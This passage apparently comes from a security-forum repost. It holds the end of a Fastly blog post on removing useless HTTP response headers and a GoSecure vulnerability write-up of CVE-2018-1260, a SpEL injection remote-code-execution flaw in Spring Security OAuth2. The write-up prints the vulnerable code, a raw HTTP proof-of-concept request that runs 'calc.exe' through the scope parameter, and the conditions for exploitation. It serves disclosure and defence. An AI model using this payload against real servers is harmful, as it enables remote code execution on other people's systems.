While it’s allowed, it’s not mandatory, and offers very little value to either developers or end users. Nevertheless, this is the third most popular HTTP response header on the web today. X-Powered-By is the most popular header in our list that is not defined in any standard, and has a similar purpose, though normally refers to the application platform that sits behind the web server. Common values include “ASP.net”, “PHP” and “Express”. Again this isn’t providing any tangible benefit and is taking up space. More debatable perhaps is Via, which is required (by RFC7230) to be added to the request by any proxy through which it passes to identify the proxy. This can be the proxy’s hostname, but is more likely to be a generic identifier like “vegur”, “varnish”, or “squid”. Removing (or not setting) this header on a request can cause proxy forwarding loops. However, interestingly it is also copied into the response on the way back to the browser, and here it’s just informational and no browsers do anything with it, so it’s reasonably safe to get rid of it if you want to. Deprecated standards (P3P, Expires, X-Frame-Options, X-UA-Compatible) Another category of headers is those that do have an effect in the browser but are not (or are no longer) the best way of achieving that effect. P3P: cp="this is not a p3p policy" Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Frame-Options: SAMEORIGIN X-UA-Compatible: IE=edge P3P is a curious animal. I had no idea what this was, and even more curiously, one of the most common values is “this is not a p3p policy”. Well, is it, or isn’t it? The story here goes back to an attempt to standardise a machine readable privacy policy. There was disagreement on how to surface the data in browsers, and only one browser ever implemented the header - Internet Explorer. Even in IE though, P3P didn’t trigger any visual effect to the user; it just needs to be present to permit access to third party cookies in iframes. 
Some sites even set a non-conforming P3P policy like the one above – even though doing so is on shaky legal ground. Needless to say, reading third party cookies is generally a bad idea, so if you don’t do it, then you won’t need to set a P3P header! Expires is almost unbelievably popular, considering that Cache-Control has been preferred over Expires for 20 years. Where a Cache-Control header includes a max-age directive, any Expires header on the same response will be ignored. But there are a massive number of sites setting both, and the Expires header is most commonly set to Thu, 01 Dec 1994 16:00:00 GMT, because you want your content to not be cached and copy-pasting the example date from the spec is certainly one way of doing that. But there is simply no reason to do this. If you have an Expires header with a date in the past, replace it with: Cache-Control: no-store, private (no-store is a very strong directive not to write the content to persistent storage, so depending on your use case you might actually prefer no-cache for better performance, for example when using back/forward navigation or resuming hibernated tabs) Some of the tools that audit your site will tell you to add an X-Frame-Options header with a value of ‘SAMEORIGIN’. This tells browsers that you are refusing to be framed by another site, and is generally a good defense against clickjacking. However, the same effect can be achieved, with more consistent support and more robust definition of behaviour, by doing: Content-Security-Policy: frame-ancestors 'self' This has the additional benefit of being part of a header (CSP) which you should have anyway for other reasons (more on that later). So you can probably do without X-Frame-Options these days. 
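The Expires-in-the-past advice can be mechanized. A minimal sketch, assuming a plain dict of response headers (the function name is mine): if Expires is dated in the past, drop it and set the Cache-Control directive the article recommends.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

def modernize_expires(headers):
    """Replace a past-dated Expires header with Cache-Control: no-store, private."""
    expires = headers.get("Expires")
    if expires is None:
        return headers
    when = parsedate_to_datetime(expires)
    if when.tzinfo is None:  # be defensive about naive dates
        when = when.replace(tzinfo=timezone.utc)
    if when < datetime.now(timezone.utc):
        del headers["Expires"]
        headers.setdefault("Cache-Control", "no-store, private")
    return headers

h = modernize_expires({"Expires": "Thu, 01 Dec 1994 16:00:00 GMT"})
print(h)  # {'Cache-Control': 'no-store, private'}
```

setdefault keeps any existing Cache-Control intact, matching the rule that a max-age directive already overrides Expires anyway.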
Finally, back in their IE9 days, Microsoft introduced ‘compatibility view’, and would potentially render a page using the IE8 or IE7 engine, even when the user was browsing with IE9, if the browser thought that the page might require the earlier version to work properly. Those heuristics were not always correct, and developers were able to override them by using an X-UA-Compatible header or meta tag. In fact, this increasingly became a standard part of frameworks like Bootstrap. These days, this header achieves very little - very few people are using browsers that would understand it, and if you are actively maintaining your site it’s very unlikely that you are using technologies that would trigger compatibility view.

Debug data (X-ASPNet-Version, X-Cache)

It’s kind of astonishing that some of the most popular headers in common use are not in any standard. Essentially this means that somehow, thousands of websites seem to have spontaneously agreed to use a particular header in a particular way.

X-Cache: HIT
X-Request-ID: 45a336c7-1bd5-4a06-9647-c5aab6d5facf
X-ASPNet-Version: 3.2.32
X-AMZN-RequestID: 0d6e39e2-4ecb-11e8-9c2d-fa7ae01bbebc

In reality, these ‘unknown’ headers are not separately and independently minted by website developers. They are typically artefacts of using particular server frameworks, software or specific vendors’ services (in this example set, the last header is a common AWS header). X-Cache, in particular, is actually added by Fastly (other CDNs also do this), along with other Fastly-related headers like X-Cache-Hits and X-Served-By. When debugging is enabled, we add even more, such as Fastly-Debug-Path and Fastly-Debug-TTL. These headers are not recognised by any browser, and removing them makes no difference to how your pages are rendered. However, since these headers might provide you, the developer, with useful information, you might like to keep a way of turning them on.
Misunderstandings (Pragma)

I didn’t expect to be in 2018 writing a post about the Pragma header, but according to our HTTP Archive data it’s still the 11th most popular. Not only was Pragma deprecated as long ago as 1997, but it was never intended to be a response header anyway - as specified, it only has meaning as part of a request.

Pragma: no-cache

Nevertheless, its use as a response header is so widespread that some browsers recognise it in this context as well. Today the probability that your response will transit a cache that understands Pragma in a response context, and doesn’t understand Cache-Control, is vanishingly small. If you want to make sure that something isn’t cached, Cache-Control: no-store, private is all you need.

Non-Browser (X-Robots-Tag)

One header in our top 30 is a non-browser header. X-Robots-Tag is intended to be consumed by a crawler, such as Google or Bing’s bots. Since it has no meaning to a browser, you could choose to only set it when the requesting user-agent is a crawler. Equally, you might decide that this makes testing harder, or perhaps that it violates the terms of service of the search engine.

Bugs

Finally, it’s worth finishing on an honourable mention for simple bugs. In a request, a Host header makes sense, but seeing it on a response probably means your server is misconfigured somehow (I’d love to know how, exactly). Nevertheless, 68 domains in HTTP archive are returning a Host header in their responses.

Removing headers at the edge

Fortunately, if your site is behind Fastly, removing headers is pretty easy using VCL.
It makes sense that you might want to keep the genuinely useful debug data available to your dev team, but hide it for public users, so that’s easily done by detecting a cookie or inbound HTTP header:

unset resp.http.Server;
unset resp.http.X-Powered-By;
unset resp.http.X-Generator;
if (!req.http.Cookie:debug && !req.http.Debug) {
  unset resp.http.X-Amzn-RequestID;
  unset resp.http.X-Cache;
}

In the next post in this series, I’ll be talking about best practices for headers that you should be setting, and how to enable them at the edge.

Author: Andrew Betts | Web Developer and Principal Developer Advocate

Sursa: https://www.fastly.com/blog/headers-we-dont-want
  24. Beware of the Magic SpEL(L) – Part 2 (CVE-2018-1260)

Written by Philippe Arteau

On Tuesday, we released the details of an RCE vulnerability affecting Spring Data (CVE-2018-1273). We are now repeating the same exercise for a similar RCE vulnerability in Spring Security OAuth2 (CVE-2018-1260). We are going to present the attack vector, its discovery method and the conditions required for exploitation. This vulnerability also has similarities with another vulnerability disclosed in 2016. The resemblance will be discussed in the section where we review the fix.

Analyzing a potential vulnerability

It all started with the report of the bug pattern SPEL_INJECTION by Find Security Bugs. It reported the use of SpelExpressionParser.parseExpression() with a dynamic parameter, the same API used in the previous vulnerability we had found. The expression parser is used to parse expressions placed between curly brackets “${…}”.

public SpelView(String template) {
    this.template = template;
    this.prefix = new RandomValueStringGenerator().generate() + "{";
    this.context.addPropertyAccessor(new MapAccessor());
    this.resolver = new PlaceholderResolver() {
        public String resolvePlaceholder(String name) {
            Expression expression = parser.parseExpression(name); //Expression parser
            Object value = expression.getValue(context);
            return value == null ? null : value.toString();
        }
    };
}

The controller class WhitelabelApprovalEndpoint uses this SpelView class to build the approval page for the OAuth2 authorization flow.
The SpelView class evaluates the string named “template” – see code below – as a Spring Expression.

@RequestMapping("/oauth/confirm_access")
public ModelAndView getAccessConfirmation(Map<String, Object> model, HttpServletRequest request) throws Exception {
    String template = createTemplate(model, request);
    if (request.getAttribute("_csrf") != null) {
        model.put("_csrf", request.getAttribute("_csrf"));
    }
    return new ModelAndView(new SpelView(template), model); //template variable is a SpEL
}

Following the methods createTemplate() and createScopes(), we can see that the attribute “scopes” is appended to the HTML template which will be evaluated as an expression. The only model parameter bound to the template is a CSRF token. However, the CSRF token will not be under the control of a remote user.

protected String createTemplate(Map<String, Object> model, HttpServletRequest request) {
    String template = TEMPLATE;
    if (model.containsKey("scopes") || request.getAttribute("scopes") != null) {
        template = template.replace("%scopes%", createScopes(model, request)).replace("%denial%", "");
    }
    [...]

private CharSequence createScopes(Map<String, Object> model, HttpServletRequest request) {
    StringBuilder builder = new StringBuilder("<ul>");
    @SuppressWarnings("unchecked")
    Map<String, String> scopes = (Map<String, String>) (model.containsKey("scopes") ? model.get("scopes") : request
            .getAttribute("scopes")); //Scope attribute loaded here
    for (String scope : scopes.keySet()) {
        String approved = "true".equals(scopes.get(scope)) ? " checked" : "";
        String denied = !"true".equals(scopes.get(scope)) ? " checked" : "";
        String value = SCOPE.replace("%scope%", scope).replace("%key%", scope).replace("%approved%", approved)
                .replace("%denied%", denied);
        builder.append(value);
    }
    builder.append("</ul>");
    return builder.toString();
}

At this point, we are unsure if the scopes attribute can be controlled by the remote user. While an attribute (req.getAttribute(..)) represents session values stored server-side, scope is an optional parameter that is part of the OAuth2 flow. The parameter might be accessible to the user, saved to the server-side attributes and finally loaded into the previous template. After some research in the documentation and some manual tests, we found that “scope” is a GET parameter that is part of the implicit OAuth2 flow. Therefore, the implicit mode would be required for our vulnerable application.
Proof-of-Concept and Limitations

When testing our application, we realized that the scopes were validated against a scopes whitelist defined by the user/client. If this whitelist is configured, we can’t be creative with the scope parameter. If the scopes are simply not defined, no validation is applied to the name of the scopes. This limitation will likely make most Spring OAuth2 applications safe.

The first request made used the scope “${1338-1}”, see picture below. Based on the response, we now have confirmation that the scope parameter’s value can reach the SpelView expression evaluation. We can see in the resulting HTML multiple instances of the string “scope.1337”.

[Image: Pushing the probe value ${1338-1}]

A second test was made using the expression “${T(java.lang.Runtime).getRuntime().exec(“calc.exe”)}” to verify that the expressions are not limited to simple arithmetic operations.

[Image: Simple proof-of-concept request spawning a calc.exe subprocess]

For easier reproduction, here is the raw HTTP request from the previous screenshot. Some characters – mainly curly brackets – were not supported by the web container and needed to be URL encoded in order to reach the application.
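The URL-encoding step can be reproduced with Python's standard library. The snippet below encodes the raw SpEL payload the same way as the raw request in the article (urllib emits uppercase hex digits, while the original request used lowercase; servers treat the two identically):

```python
from urllib.parse import quote

payload = '${T(java.lang.Runtime).getRuntime().exec("calc.exe")}'

# Leave parentheses and dots literal, as in the original request; $, {, } and " get encoded.
encoded = quote(payload, safe="().")
print(encoded)
# %24%7BT(java.lang.Runtime).getRuntime().exec(%22calc.exe%22)%7D
```

The encoded string is what goes into the scope= query parameter of the /oauth/authorize request.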
{ -> %7b

POST /oauth/authorize?response_type=code&client_id=client&username=user&password=user&grant_type=password&scope=%24%7bT(java.lang.Runtime).getRuntime().exec(%22calc.exe%22)%7d&redirect_uri=http://csrf.me HTTP/1.1
Host: localhost:8080
Authorization: Bearer 1f5e6d97-7448-4d8d-bb6f-4315706a4e38
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 0

Reviewing The Fix

The solution chosen by the Pivotal team was to replace SpelView with a simpler view, with basic concatenation. This eliminates all possible paths to a SpEL evaluation. The first patch proposed introduced a potential XSS vulnerability, but luckily this was spotted before any release was made. The scope values are now properly escaped and free from any injection.

More importantly, this solution improved the security of another endpoint: WhitelabelErrorEndpoint. The endpoint also no longer uses a SpelView. It was found vulnerable to an identical attack vector in 2016. Spring-OAuth2 also used the SpelView class to build the error page. The interesting twist is that the template parameter was static, but the parameters bound to the template were evaluated recursively. This means that any value in the model could lead to a Remote Code Execution.

[Image: Example with normal values]

[Image: Example with an expression included in the model]

This recursive evaluation was fixed by adding a random prefix to the expression boundary. The security of this template now relies on the randomness of 6 characters (62 possibilities to the power of 6).
Some analysts were skeptical regarding this fix and raised the risk of a race condition if enough attempts are made. However, this is no longer a possibility since SpelView was also removed from this endpoint.

The SpelView class is also present in Spring Boot. This implementation has a custom resolver to avoid recursion. This means that while the Spring-OAuth2 project no longer uses it, some other components, or proprietary applications, might have reused (copy-pasted) this utility class to save some time. For this reason, a new detector looking for SpelView was introduced in Find Security Bugs. The detector does not look for a specific package name because we assume that the application will likely have a copy of the SpelView class rather than a reference to Spring-OAuth2 or Spring Boot classes.

Limitation & exploitability

We encourage you to keep all your web applications’ dependencies up-to-date. If for any reason you must delay last month’s updates, here are the specific conditions for exploitation:

- Spring OAuth2 in your dependency tree
- The users must have implicit flow enabled; it can be enabled along with other grant types
- The scope list needs to be empty (not explicitly set to one or more elements)

The good news is that not all OAuth2 applications will be vulnerable. In order to specify arbitrary scopes, the user profile of the attacker needs to have an empty list of scopes.

Conclusion

This was the second and last article of the series on SpEL injection vulnerabilities. We hope it brought some light on this less frequent vulnerability class. As mentioned previously in Part 1, finding this vulnerability class in your own application is unlikely. It is more likely to come up in components similar to Spring-Data or Spring-OAuth. If you are a Java developer or tasked with reviewing Java code for security, you could scan your application using Find Security Bugs, the tool we used to find this vulnerability.
This type of vulnerability hunting can be daunting because many code patterns cause indirection, making variable tracking harder. Kudos to Alvaro Muñoz, pyn3rd and Gal Goldshtein, who reproduced the vulnerability and documented the flaw a few days after the official announcement made by Pivotal.

References
https://pivotal.io/security/cve-2018-1260: Official vulnerability announcement by Pivotal
https://pivotal.io/security/cve-2016-4977: Similar vulnerability affecting Spring-OAuth2
https://docs.spring.io/spring/docs/3.0.x/reference/expressions.html: Spring Expression Language capabilities
http://find-sec-bugs.github.io/bugs.htm#SPEL_INJECTION: Bug description from Find Security Bugs

Sursa: http://gosecure.net/2018/05/17/beware-of-the-magic-spell-part-2-cve-2018-1260/